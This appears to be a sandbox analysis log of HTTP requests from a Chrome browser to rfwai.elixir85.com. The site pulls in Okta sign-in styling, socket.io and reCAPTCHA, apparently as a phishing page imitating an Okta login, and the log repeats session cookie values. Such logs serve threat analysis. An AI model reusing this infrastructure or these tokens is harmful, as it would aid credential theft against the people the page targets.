XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /pqC74CTJePSu4Ivyz37z7VePwx37 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /12uyZYHBH78nzrKfwqr47 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /90jodEH2Rir67QW4OuPst51 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /45JQQXGinJG902EgrDtnvQTvw65 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T190720Z&X-Amz-Expires=300&X-Amz-Signature=2954020ef3ae9b37bcd25c50a692a541af80978c55971e321c89a2f9def9fd71&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rfwai.elixir85.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /345f8FXSJyBv6seEmEdklOXxG5e6FIs89107 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
